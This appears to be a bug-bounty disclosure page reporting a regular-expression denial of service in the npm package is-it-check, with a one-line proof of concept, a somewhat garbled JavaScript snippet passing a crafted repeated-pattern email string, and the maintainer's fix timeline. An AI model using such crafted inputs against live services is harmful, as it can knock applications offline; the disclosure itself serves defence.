ReDoS in is-it-check in evdama/is-it-check


Reported on

Mar 19th 2022

✍️ Description

It allows causing a denial of service when checking crafted invalid emails.

🕵️‍♂️ Proof of Concept

// PoC.js
var isItCheck = require("is-it-check")'_@A.'+ '0.0.'.repeat(40)+'~A')

We are processing your report and will contact the evdama/is-it-check team within 24 hours. a year ago
We have contacted a member of the evdama/is-it-check team and are waiting to hear back a year ago
a year ago


Same as for the is.url() check... Two possible solutions, a) add a str.length() check or b) modify existing regex with a length check. Would you mind sending a PR to ?

a year ago


I opted for b

Markus validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus marked this as fixed in 1.0.0 with commit 74b014 a year ago
Markus has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation